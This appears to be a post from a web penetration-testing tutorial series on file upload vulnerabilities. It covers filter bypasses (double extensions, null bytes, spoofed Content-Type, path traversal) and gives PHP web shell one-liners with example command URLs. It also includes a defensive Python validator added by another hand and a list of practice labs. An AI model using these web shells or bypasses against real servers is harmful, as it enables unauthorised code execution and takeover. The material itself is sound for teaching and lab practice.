Post 6: File Upload Vulnerabilities
From Upload Field to Remote Code Execution
If a web application allows users to upload files, you’re potentially looking at an RCE jackpot. File upload vulnerabilities occur when the app fails to properly validate or restrict file types, extensions, or paths — allowing attackers to upload malicious files like web shells, scripts, or executables.
This post will teach you how to identify, test, and exploit vulnerable upload forms.
Table of Contents
- Why File Uploads Are Dangerous
- How File Uploads Work
- Common Misconfigurations
- Manual Testing Steps
- Bypassing Extension and MIME Type Filters
- Uploading Web Shells
- File Path Tricks (Traversal, Overwrites)
- Tools and Practice Labs
1. Why File Uploads Are Dangerous
A vulnerable upload can lead to:
- Remote Code Execution (if you upload a script)
- Server-side request forgery (SSRF)
- Local file inclusion or overwrite
- Privilege escalation via log poisoning or cron jobs
It’s a direct path to owning the box.
2. How File Uploads Work
Typically:
- You fill out a form and select a file.
- The file is sent to the server.
- The server saves the file somewhere like /uploads/ or /temp/.
- The file is served back or processed.
The application should:
- Restrict extensions (e.g., only .jpg, .png)
- Check content type and headers
- Sanitize the filename
- Validate path and access rights
If any of these fail — you win.
3. Common Misconfigurations
Look for:
- Accepting any file type
- Blacklisting instead of whitelisting
- Filtering based only on file extension
- Not checking content type
- Uploading files to web-accessible directories
- Executing uploaded files as scripts
4. Manual Testing Steps
Step 1: Upload a normal file
Try uploading test.jpg, test.png, test.txt. Confirm:
- Does it get accepted?
- Where is it stored?
- Can you access it via URL?
http://target.com/uploads/test.jpg
If you get a 200 OK — you know where the upload directory is.
Step 2: Try to upload .php, .asp, .jsp
Even if it’s rejected, intercept the request in Burp Suite, and change the file extension or Content-Type manually.
5. Bypassing Extension and MIME Type Filters
Double Extensions (and null-byte truncation):
shell.php.jpg
shell.php;.jpg
shell.ph%00p
Content-Type Spoofing:
In Burp, try:
Content-Type: image/jpeg
Even if the file is PHP.
Rename File in Request:
Some apps take the filename from the Content-Disposition header. Try:
Content-Disposition: form-data; name="file"; filename="shell.php"
6. Uploading Web Shells
PHP Shell Example:
<?php system($_GET['cmd']); ?>
Upload as shell.php, then access:
http://target.com/uploads/shell.php?cmd=whoami
Or:
<?=`$_GET[0]`?>
Then:
http://target.com/uploads/shell.php?0=ls
For Windows, use .asp or .aspx shells. For Java-based apps, try .jsp.
7. File Path Tricks (Traversal, Overwrites)
Try uploading with:
../../../../var/www/html/shell.php
If the server does not sanitize the path, you might overwrite files or place your shell in a location that is executed by the server.
Check for:
- Overwriting index.php or 404.html
- Poisoning log files
- Uploading .htaccess to modify server behavior
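As an added example (not code from the original post), here is the server-side validator that sections 2, 5 and 7 imply: it whitelists extensions, checks magic bytes instead of trusting the client's Content-Type, and rejects the double-extension, null-byte and traversal filenames shown above. The upload directory path and the function names are assumptions.

```python
import os
import re
import secrets
from urllib.parse import unquote

# Assumed: a directory outside the web root with script execution disabled,
# so even a file that slips through is never run by the server.
UPLOAD_DIR = "/srv/app/uploads"

# Extension whitelist -> (expected Content-Type, magic bytes the file must start with)
ALLOWED = {
    "jpg": ("image/jpeg", b"\xff\xd8\xff"),
    "png": ("image/png", b"\x89PNG\r\n\x1a\n"),
}


def validate_upload(filename, content_type, data):
    """Return (ok, detail). Whitelist + magic bytes decide; Content-Type is only
    cross-checked, never trusted on its own."""
    # Decode %xx first so shell.ph%00p becomes a real null byte we can see,
    # then strip any directory part (../../../var/www/html/shell.php -> shell.php).
    name = os.path.basename(unquote(filename).replace("\\", "/"))
    # Null bytes, other control characters and ';' have no place in a filename
    if not name or re.search(r"[\x00-\x1f\x7f;]", name):
        return False, "illegal character in filename"
    parts = name.lower().split(".")
    # Exactly one extension: rejects shell.php.jpg, '.', '..' and '.htaccess'
    if len(parts) != 2 or not parts[0]:
        return False, "exactly one extension required"
    ext = parts[1]
    if ext not in ALLOWED:
        return False, f"extension .{ext} not allowed"
    expected_type, magic = ALLOWED[ext]
    if content_type != expected_type:
        return False, "Content-Type does not match extension"
    # A PHP body renamed to .jpg with a spoofed Content-Type fails here
    if not data.startswith(magic):
        return False, "file content does not match extension"
    return True, ext


def safe_store_name(ext):
    """Server-chosen random name: the client never controls the stored path."""
    return os.path.join(UPLOAD_DIR, f"{secrets.token_hex(16)}.{ext}")
```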
8. Tools and Practice Labs
Tools:
- Burp Suite – Intercept and modify file upload requests
- ffuf – Fuzz upload directories:
ffuf -u http://target.com/FUZZ -w wordlists/content.txt
- upload_bypasser.py – Automate common file upload tricks
- weevely – Generate and interact with PHP web shells
Checklist for Upload Testing
| Test | Goal |
|---|---|
| Upload basic file | Find upload directory and behavior |
| Try script extensions | Trigger execution of uploaded file |
| Change Content-Type | Bypass MIME filters |
| Use Burp to modify extension | Trick the backend |
| Access uploaded file directly | Confirm web-accessible path |
| Try double extensions | Bypass frontend checks |
| Upload web shell | Gain command execution |
Practice Labs
- TryHackMe: File Uploads, Inclusion Room, OWASP Labs
- PortSwigger Labs: File upload bypass series
- bWAPP / DVWA: File upload module
- HackTheBox: Boxes tagged with upload, web, RCE
Coming Up Next
Post 7: Local & Remote File Inclusion (LFI/RFI)
We’ll cover:
- How to read sensitive files (passwd, config)
- Exploiting log files for code execution
- RFI to load malicious scripts remotely
- Detection and real-world exploitation
Let me know when you’re ready to jump into file inclusion.
